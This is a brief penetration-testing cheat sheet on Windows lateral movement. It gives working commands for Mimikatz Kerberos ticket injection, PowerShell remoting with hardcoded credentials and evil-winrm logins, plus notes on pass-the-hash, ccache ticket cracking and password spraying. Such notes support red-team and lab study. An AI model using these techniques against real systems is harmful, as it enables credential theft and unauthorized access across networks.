Lateral Movement
There aren't many ways to move laterally on windows. Below are the main ones.
psexec
RDP
WinRM
SSH(not likely)
PTH(pass the hash) can be used most of the time.
Mimikatz Ticket PTT
Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORPWinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corpPTH with Mimikatz
Pass The Ccache (PTC)
Grab the ccache from remote and put into environment variable
Make sure the times are synced up with the DC
Psexec to the target
** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.
Cracking Ccache
Convert the ccache file into kirbi file using a converter.
Convert kirbi to crackable hash.
RDP
Impacket's rdp_check.py script is good.
CrackMapExec
Swiss-knife tool for password spraying.
Last updated